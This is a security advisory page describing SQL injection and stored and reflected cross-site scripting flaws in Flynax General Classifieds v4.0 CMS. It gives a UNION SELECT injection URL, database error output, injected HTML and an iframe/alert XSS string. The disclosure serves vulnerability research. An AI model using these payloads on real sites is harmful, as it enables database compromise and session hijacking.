Flynax General Classifieds v4.0 CMS Multiple Vulnerabilities

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Flynax General Classifieds v4.0 CMS.

Credit:
The information has been provided by Benjamin Kunz Mejri .

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* Flynax General Classifieds v4.0

A SQL Injection vulnerability is detected in the Flynax General Classifieds v4.0 Content Management System. Remote attackers without privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the general module with the bound vulnerable sort_by parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Exploitation requires no user inter action & without privileged user account.

Vulnerable Module(s):
[+] General

Vulnerable Parameter(s):
[+] sort_by

Multiple persistent input validation vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in Administrators, User Account & Categories add/list modules with the bound vulnerable titel & username parameters. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action & privileged user account.

Vulnerable Module(s):
[+] Common > Administrators > Add an Administrator & Listing
[+] User Accounts > Add an User Account & Listing
[+] Categories > Add a Category & Listing

Vulnerable Parameter(s):
[+] Username
[+] Titel

1.3
Multiple non persistent cross site scripting vulnerabilities are detected in the Flynax General Classifieds v4.0 Content Management System. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user interaction or local low privileged user account. The bugs are located in the seach module with the bound vulnerable Titel & Price parameters. Successful exploitation can result in account steal, client side phishing & client-side content request manipulation. Exploitation requires medium or high user inter action & without privileged web application user account.

Vulnerable Module(s):
[+] Search

Vulnerable Parameter(s):
[+] Titel
[+] Price

Proof of Concept:
The SQL Injection Vulnerability can be exploited by remote attackers without user inter action & without privileged user account. For demonstration or reproduce ...

PoC:
http://general.[SERVER]:1339/general?sort_by=-1 union all select 1,2,3,4,5,6,7,8,9,@@version,11--

--- Exception Logs ---
MYSQL ERROR
Error: Unknown column 'T1.' in 'order clause'

Query: SELECT SQL_CALC_FOUND_ROWS DISTINCT SUBSTRING_INDEX(GROUP_CONCAT(DISTINCT `T6`.`Thumbnail` ORDER BY `T6`.`Type`
DESC, `T6`.`ID` ASC), ',', 1) AS `Main_photo`, `T1`.*, `T1`.`Shows`, `T3`.`Path` AS `Path`, `T3`.`Key` AS `Key`, `T3`.`Type`
AS `Listing_type`, COUNT(`T6`.`Thumbnail`) AS `Photos_count`, IF(UNIX_TIMESTAMP(DATE_ADD(`T1`.`Featured_date`, INTERVAL `T2`.`
Listing_period` DAY)) > UNIX_TIMESTAMP(NOW()) OR `T2`.`Listing_period` = 0, '1', '0') `Featured` FROM `fl_listings` AS `T1`
LEFT JOIN `fl_listing_plans` AS `T2` ON `T1`.`Plan_ID` = `T2`.`ID` LEFT JOIN `fl_categories` AS `T3` ON `T1`.`Category_ID` =
`T3`.`ID` LEFT JOIN `fl_listing_photos` AS `T6` ON `T1`.`ID` = `T6`.`Listing_ID` LEFT JOIN `fl_accounts` AS `T7` ON `T1`.`
Account_ID` = `T7`.`ID` WHERE ( UNIX_TIMESTAMP(DATE_ADD(`T1`.`Pay_date`, INTERVAL `T2`.`Listing_period` DAY)) > UNIX_TIMESTAMP(NOW())
OR `T2`.`Listing_period` = 0 ) AND `T1`.`Account_ID` = '2' AND `T1`.`Status` = 'active' AND `T3`.`Status` = 'active' GROUP BY `T1`.
`ID` ORDER BY `T1`.`` DESC LIMIT 0, 10

Function: getAll
Class: rlDb
File: /home/[PATH]/public_html/general/includes/classes/rlListings.class.php (line# 831)

The persistent input validation vulnerabilities can be exploited with low privileged user account and low required user inter action. For demonstration or reproduce ...

Review: User Accounts > Add an User Account & Listing

<tr class="x-grid3-row-body-tr" style=""><td colspan="9" class="x-grid3-body-cell" tabindex="0" hidefocus="on"><div class="x-grid3-row-body">
</div></td></tr></tbody></table></div><div class="x-grid3-row x-grid3-row-collapsed x-grid3-row-last" style="width: 1063px;">
<table class="x-grid3-row-table" style="width: 1063px;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="x-grid3-col x-grid3-cell
x-grid3-td-checker x-grid3-cell-first " style="width: 19px;" tabindex="0"><div class="x-grid3-cell-inner x-grid3-col-checker"
unselectable="on"><div class="x-grid3-row-checker"> </div></div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-expander "
style="width: 18px;" tabindex="0" rowspan="2"><div class="x-grid3-cell-inner x-grid3-col-expander" unselectable="on"><div class="x-grid3-row-expander">
</div></div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-rlExt_black_bold " style="width: 38px;" tabindex="0">
<div class="x-grid3-cell-inner x-grid3-col-rlExt_black_bold" unselectable="on">5</div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-3 "
style="width: 116px;" tabindex="0"><div class="x-grid3-cell-inner x-grid3-col-3" unselectable="on">><[INJECTED PERSISTENT SCRIPT CODE]</div'>
</td><td class="x-grid3-col x-grid3-cell x-grid3-td-rlExt_item_bold " style="width: 226px;" tabIndex="0" ><div
class="x-grid3-cell-inner x-grid3-col-rlExt_item_bold" unselectable="on" ><a href="http://general.[SERVER]:1339/admin/index.php?controller=
accounts&action=view&userid=5">N/A</a></div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-rlExt_item "
style="width: 198px;" tabIndex="0" ><div class="x-grid3-cell-inner x-grid3-col-rlExt_item" unselectable="on" ><span ext:
qtip="Click here to edit">yea@gmail.com</span></div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-6 "
style="width: 116px;" tabIndex="0" ><div class="x-grid3-cell-inner x-grid3-col-6" unselectable="on" >Buyer</div></td
><td class="x-grid3-col x-grid3-cell x-grid3-td-7 " style="width: 116px;" tabIndex="0" ><div class="x-grid3-cell-inner
x-grid3-col-7" unselectable="on" >Jul 10, 2012</div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-8 " style="width:
98px;background: #d2e798;" tabIndex="0" ><div class="x-grid3-cell-inner x-grid3-col-8" unselectable="on" ><span
ext:qtip="Click here to edit">Active</span></div></td><td class="x-grid3-col x-grid3-cell x-grid3-td-9 x-grid3-cell-last
" style="width: 98px;" tabIndex="0" ><div class="x-grid3-cell-inner x-grid3-col-9" unselectable="on" ><center><a
href='http://general.[SERVER]:1339/admin/index.php?controller=accounts&action=view&userid=5'><img class='view'
ext:qtip='View' src='http://general.[SERVER]:1339/admin/img/blank.gif' /></a><a href='http://general.[SERVER]:1339/admin/
index.php?controller=accounts&action=edit&account=5'><img class='edit' ext:qtip='Edit' src='http://general.[SERVER]:1339/
admin/img/blank.gif' /></a><img class='remove' ext:qtip='Delete' src='http://general.[SERVER]:1339/admin/img/blank.gif'
onclick='xajax_prepareDeleting(5)' /></center></div></td></tr><tr class="x-grid3-row-body-tr" style=""><
td colspan="9" class="x-grid3-body-cell" tabIndex="0" hidefocus="on"><div class="x-grid3-row-body"></div></td></tr
></tbody></table></div></iframe></div></td></tr></tbody></table></div></div>

Common > Administrators > Add an Administrator > Username
URL: http://general.[SERVER]:1339/admin/index.php?controller=admins
URL: http://general.[SERVER]:1339/admin/index.php?controller=admins&status=new

User Accounts > Add an User Account > Username
URL: http://general.[SERVER]:1339/admin/index.php?controller=accounts
URL: http://general.[SERVER]:1339/admin/index.php?controller=accounts&status=new

Review: Categories > Add a Category & Listing
<div class="x-grid3-cell-inner x-grid3-col-rlExt_item_bold" unselectable="on">><[INJECTED PERSISTENT SCRIPT CODE])' <<="" div=""></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-1 " style="width: 93px;" tabIndex="0" ><div class="x-grid3-cell-inner x-grid3-col-1"
unselectable="on" ><a style="display: block;" ext:qtip="Browse Category" class="green_11" href="http://general.127.0.0.1:1339/admin/index.php?
controller=browse&id=13"><b>2</b></a></div><

Categories > Add a Category > Title
URL: http://general.[SERVER]:1339/admin/index.php?controller=categories
URL: http://general.[SERVER]:1339/admin/index.php?controller=categories&status=new

The non persistent cross site scripting vulnerability can be exploited by remote attackers with medium or high required user inter action.
For demonstration or reproduce ...

String: ><iframe src=http://vuln-lab.com onload=alert("VulnerabilityLab") <

Review: Search - Title & Price

<div class="value">
<input><[NON PERSISTENT SCRIPT CODE]" class="numeric field_from w50" type="text"
name="f[price][from]" maxlength="15"><img
alt=""
src="http://general.demoflynax.com/templates/general_modern/img/blank.gif"
class="between" /><input value=""><iframe src=a"
class="numeric field_to w50" type="text" name="f[price][to]"
maxlength="15" />
</div>

URL: http://general.[SERVER]:1339/search.html

Disclosure Timeline:
2012-07-13: Public or Non-Public Disclosure

blog comments powered by Disqus

	Moodle WebDav Repository Plaintext Password Disclosure Vulnerability
	QuickShare File Share Directory Traversal Vulnerability
	ELinks Security Bypass Vulnerability
	BlazeDVD PLF Exploit DEP/ASLR Bypass (MSF) Vulnerability
	WebKit Web Audio Channel Handling Race Condition Buffer Overflow Vulnerability
	Verax NMS Console AMF Response Plaintext Connection Information Disclosure Vulnerability
	Simeji for Android Application Handling Information Disclosure Vulnerability
	Ptlib Entity Expansion Recursion XML Nested Entity Handling DoS Vulnerability
	ownCloud /core/settings/ajax/setquota.php quota Parameter XSS Vulnerability
	Nitro Pro PDF File Handling DoS Vulnerability
	MailOrderWorks Dispatch Order Multiple Field XSS Vulnerability
	Linux Kernel Dccp Subsystem Ccid Null Pointer Dereference Local DoS Vulnerability
	ISC DHCP libdns Unspecified Remote Memory Exhaustion DoS Vulnerability
	GroundWork Monitor Enterprise Noma Component Multiple XSS Vulnerability
	GroundWork Monitor Enterprise Foundation Admin Interface XSS Vulnerability
	Google Chrome Isolated Web Sites Process Handling Issue Vulnerability
	Google Android On Samsung Unprivileged Arbitrary SMS Message Sending Vulnerability
	FFmpeg Libavcodec/error Function NULL Pointer Dereference DoS Vulnerability
	Commons Groups Module for Drupal Group Access Restriction Bypass Vulnerability
	Cfingerd RFC1413 (Ident) Client Remote Overflow Vulnerability